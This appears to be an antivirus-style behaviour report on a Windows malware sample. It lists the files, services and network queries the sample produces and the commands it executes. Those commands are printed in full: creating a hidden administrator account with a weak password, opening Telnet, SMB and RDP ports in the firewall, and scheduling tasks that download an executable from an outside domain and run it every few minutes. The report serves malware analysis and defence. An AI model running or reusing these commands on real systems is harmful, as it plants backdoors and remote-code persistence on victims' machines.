Technical Information
To ensure autorun and distribution
Creates the following services
- 'umbus' system32\DRIVERS\umbus.sys
Malicious functions
Executes the following
- '%WINDIR%\syswow64\net.exe' user Remo 123456 /add
- '%WINDIR%\syswow64\net.exe' localgroup "Administradores" Remo /add
- '%WINDIR%\syswow64\netsh.exe' firewall add portopening TCP 23 TELNET enable subnet
- '%WINDIR%\syswow64\netsh.exe' firewall add portopening TCP 139 mameda enable subnet
- '%WINDIR%\syswow64\netsh.exe' firewall add portopening UDP 137 mameda enable subnet
- '%WINDIR%\syswow64\netsh.exe' firewall add portopening UDP 138 mameda enable subnet
- '%WINDIR%\syswow64\netsh.exe' firewall add portopening TCP 445 mameda enable subnet
- '%WINDIR%\syswow64\netsh.exe' firewall add portopening TCP 3389 mameda enable subnet
Modifies file system
Creates the following files
- %WINDIR%\play.dll
- %WINDIR%\wget.exe
- <SYSTEM32>\microsoft\protect\s-1-5-20\574c1b9e-1577-4a13-ace3-a7616e8fef7d
- <SYSTEM32>\microsoft\protect\s-1-5-20\preferred
- %ALLUSERSPROFILE%\microsoft\crypto\rsa\machinekeys\f686aace6942fb7f7ceb231212eef4a4_0cb67e2f-dc95-45ca-8fb8-69bde8e3f814
Network activity
UDP
- DNS ASK ca#####tocantins.com.br
Miscellaneous
Searches for the following windows
- ClassName: 'EDIT' WindowName: ''
- ClassName: 'MS_WINHELP' WindowName: ''
Executes the following
- '%WINDIR%\syswow64\rundll32.exe' %WINDIR%\Play.dll Registrar
- '%WINDIR%\syswow64\attrib.exe' -h C:\Arquiv~1\Scpad
- '%WINDIR%\syswow64\regsvr32.exe' /S \\rjcusrpzqz\DiscoLocal$\star.dll
- '%WINDIR%\syswow64\net1.exe' localgroup "Administradores" Remo /add
- '%WINDIR%\syswow64\schtasks.exe' /create /tn UpdateWIN1 /tr "wget http://youtubemobiile.com/updt/updt.txt -O %WINDIR%\Config\001.exe" /sc minuto /mo 5 /ru Remo /rp 123456
- '%WINDIR%\syswow64\schtasks.exe' /create /tn UpdateWIN2 /tr "%WINDIR%\Config\001.exe" /sc minuto /mo 8 /ru Remo /rp 123456
- '%WINDIR%\syswow64\net1.exe' user Remo 123456 /add
- '%WINDIR%\syswow64\net1.exe' start Telnet
- '%WINDIR%\syswow64\net.exe' start Telnet
- '%WINDIR%\syswow64\sc.exe' config TlntSvr start= auto
- '%WINDIR%\syswow64\netsh.exe' firewall add portopening TCP 139 mameda enable subnet' (with hidden window)
- '%WINDIR%\syswow64\net.exe' start Telnet' (with hidden window)
- '%WINDIR%\syswow64\netsh.exe' firewall add portopening UDP 138 mameda enable subnet' (with hidden window)
- '%WINDIR%\syswow64\attrib.exe' -h C:\Arquiv~1\Scpad' (with hidden window)
- '%WINDIR%\syswow64\netsh.exe' firewall add portopening TCP 3389 mameda enable subnet' (with hidden window)
- '%WINDIR%\syswow64\net.exe' localgroup "Administradores" Remo /add' (with hidden window)
- '%WINDIR%\syswow64\schtasks.exe' /create /tn UpdateWIN2 /tr "%WINDIR%\Config\001.exe" /sc minuto /mo 8 /ru Remo /rp 123456' (with hidden window)
- '%WINDIR%\syswow64\schtasks.exe' /create /tn UpdateWIN1 /tr "wget http://youtubemobiile.com/updt/updt.txt -O %WINDIR%\Config\001.exe" /sc minuto /mo 5 /ru Remo /rp 123456' (with hidden window)
- '%WINDIR%\syswow64\netsh.exe' firewall add portopening TCP 23 TELNET enable subnet' (with hidden window)
- '%WINDIR%\syswow64\sc.exe' config TlntSvr start= auto' (with hidden window)
- '%WINDIR%\syswow64\net.exe' user Remo 123456 /add' (with hidden window)
- '%WINDIR%\syswow64\netsh.exe' firewall add portopening UDP 137 mameda enable subnet' (with hidden window)
- '%WINDIR%\syswow64\netsh.exe' firewall add portopening TCP 445 mameda enable subnet' (with hidden window)
